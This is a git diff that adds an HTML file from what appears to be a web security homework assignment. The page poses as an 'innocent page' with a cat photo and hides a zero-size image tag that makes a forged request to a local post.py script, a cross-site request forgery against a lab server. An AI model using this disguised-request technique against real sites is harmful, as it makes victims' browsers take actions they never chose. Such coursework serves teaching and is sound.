diff options
Diffstat (limited to 'hw4/csrf.html')
| -rw-r--r-- | hw4/csrf.html | 14 |
1 files changed, 14 insertions, 0 deletions
diff --git a/hw4/csrf.html b/hw4/csrf.html new file mode 100644 index 0000000..3e8cdae --- /dev/null +++ b/hw4/csrf.html @@ -0,0 +1,14 @@ +<html> +<title> Innocent page </title> +<body> +<h2>This is innocent page, here is a picture of a cute cat: </h2> <br> + +<img src="cat.jpg"> + +<!-- Insert your CSRF attack here. For example you can use another hidden <img> to +generate an HTTP request to post.py to write something from victim --> + +<img src="http://127.0.0.1:8000/cgi-bin/post.py?message=i%20am%20not%20l33t" width="0" height="0" border="0"> + +</body> +</html> |